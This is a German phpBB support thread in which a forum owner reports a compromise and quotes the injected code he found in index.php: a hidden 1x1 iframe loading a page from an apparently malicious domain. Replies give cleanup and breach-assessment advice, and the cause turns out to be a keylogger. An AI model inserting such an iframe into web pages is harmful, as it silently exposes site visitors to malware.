Sicherheitslücke in meinem Forum?

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
fridulin
Mitglied
Beiträge: 6
Registriert: 06.09.2010 20:19

Sicherheitslücke in meinem Forum?

Beitrag von fridulin »

Guten Tag.
Ich bin gerade etwas platt als ich gesehen habe, dass beim Öffnen meines Forums eine Warnung wegen Malware von Chrom ausgegeben wurde... Daher hab ich mal geguckt, welche Dateien in den letzten Tage verändert wurden und Tatsächlich gab es Änderungen.

In der Index.php wurde folgender Code eingebaut, der mich hellhörig macht:

Code: Alles auswählen

<iframe src="http://osbasedreceiva.pl/img3/count.htm" width="1" height="1" frameborder="0"></iframe><?php
Wie kann ich rausbekommen, was noch angefasst wurde und sollte ich alle Benutzer vor einem Passwortklau warnen?

edit: Ich habe nun mal per FileZilla gecheckt, welche Dateien ein Änderungsdatum aus der heutigen Nacht haben und habe dort richtig viele gefunden.... Es betrifft praktisch alle Verzeichnisse...
Nach oben
Benutzeravatar
mad-manne
Ehemaliges Teammitglied
Beiträge: 5403
Registriert: 18.03.2005 10:00
Wohnort: Marl im Ruhrgebiet

Re: Sicherheitslücke in meinem Forum?

Beitrag von mad-manne »

Ganz allgemein gilt hier wohl folgendes ...
KB:gehackt

Gruß,
Manne.
Try not. Do or do not. There is no try. (YODA)
Supportanfragen via E-Mail oder PN werden ignoriert
Nach oben
cpg
Mitglied
Beiträge: 510
Registriert: 24.11.2007 12:43
Kontaktdaten:
Kontaktdaten von cpg

Re: Sicherheitslücke in meinem Forum?

Beitrag von cpg »

Moin,

ganz wichtig ist die Frage: wie konnte das passieren?

Deshalb bitte hier wieder melden und posten, ob es da neue Erkenntnisse gibt. Dann können die anderen User den Blick auf ihr eigenes Forum auch noch einmal schärfen.

Nachtrag: "osbasedreceiva.pl" ist bekannt...
Gestern hat es wohl mehrere Angriffe auf Foren gegeben. Ich stellte nachmittags auch fest, dass fast doppelt so viele User online waren als sonst (ganz plötzlich) und konnte mir das nicht erklären.
Sicherlich lohnt sich erhöhte Wachsamkeit!

Welche Rechte haben bei Dir Gäste? ... und ganz neue User? Dürfen die sofort posten?

Viel Erfolg bei Deiner Arbeit!
Gruß
CPG
Nach oben
Benutzeravatar
mad-manne
Ehemaliges Teammitglied
Beiträge: 5403
Registriert: 18.03.2005 10:00
Wohnort: Marl im Ruhrgebiet

Re: Sicherheitslücke in meinem Forum?

Beitrag von mad-manne »

So ... bin jetzt wieder mit PC und nicht mit Smartphone unterwegs ... da fällt das schreiben auch leichter :P
fridulin hat geschrieben:Wie kann ich rausbekommen, was noch angefasst wurde
Wenn du ein Backup des gewollten StatusQuo hast ... dann kannst du den aktuellen mit dem Soll-Zustand z.B. mittels WinMerge vergleichen lassen ...
und sollte ich alle Benutzer vor einem Passwortklau warnen?
Offenbar hatte der Hacker ja FTP-Zugriff und somit hat er durch den Zugriff auf die config.php leider auch die Zugangsdaten zum Datenbank-Server ... das ist die schlechte Nachricht :oops:

DIe gute ist: Da die Kennwörter in der Datenbank nur verschlüsselt abgelegt wurden, ist es quasi unmöglich daraus wieder die originalen Kennwörter abzuleiten. Worauf der Hacker aber evtl. Zugriff erlangt haben könnte sind die unverschlüsselten Informationen aus der User-Tabelle ... allen voran die E-Mailadressen!

Viel Erfolg bei der Fehlersuche und dem Neustart deines Forums,
Manne.
Try not. Do or do not. There is no try. (YODA)
Supportanfragen via E-Mail oder PN werden ignoriert
Nach oben
fridulin
Mitglied
Beiträge: 6
Registriert: 06.09.2010 20:19

Re: Sicherheitslücke in meinem Forum?

Beitrag von fridulin »

@mad-manne: Danke für den sehr nützlichen Link zum Vorgehen. Ohne es gelesen zu haben waren die ersten 3 Schritt meine sofortige Reaktion. Ich werde alle Punkte mal genau prüfen. Es ist auch gut zu wissen, dass die Passwörter nicht ohne weiteres ausgelesen werden könnten. Ich habe geprüft ob es einen neuen DB User gibt und das ist nicht der Fall. Es gibt eine tägliche Sicherung des Forum per Cron und das werde ich mal mit dem Stand heute Vormittag vergleichen.

@cpg: Gäste haben bei mir Leserechte und das wars. Ich vermute allerdings, dass die Zugriffsrechte auf meinem FTP Server vielleicht nicht richtig waren und habe diese nochmals kontrolliert und neu vergeben. Zeitgleich zu diesem Vorfall im Forum habe ich noch einen Missbrauch einer meiner Mailpostfächer festgestellt, dass mit dem gleichen Kennwort wie der FTP Hauptuser gearbeitet hat. Der Benutzer und die Domain waren allerdings vollkommen unterschiedlichen und waren auf unterschiedlichen "Webpackages" bei dem gleichen Anbieter gebucht. Momentan habe ich einen Keylogger oder ähnliches in Verdacht. Der Anbieter (All-Inkl.de) ist per Mail über diesen Vorgang informiert und vielleicht finden die auch noch was.
Nach oben
fridulin
Mitglied
Beiträge: 6
Registriert: 06.09.2010 20:19

Re: Sicherheitslücke in meinem Forum?

Beitrag von fridulin »

Ich habe nun herausgefunden dass alles auf Grund eines Keyloggers verursacht wurde. Leider hat AntiVir bei mir irgendwie versagt... Ich habe am 24.10. praktisch alle meine Kennwort geändert aber ca 2-3 Tage später wurde ein weiteres Mailpostfach zum Spamversand missbraucht. Dieses war nur auf einem einzigen Computer eingerichtet und dort habe ich dann tatsächlich eine Infektion gefunden. Wollte euch nur noch mal die Rückmeldung geben, dass es nicht an phpBB gelegen hat :wink:
Nach oben
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“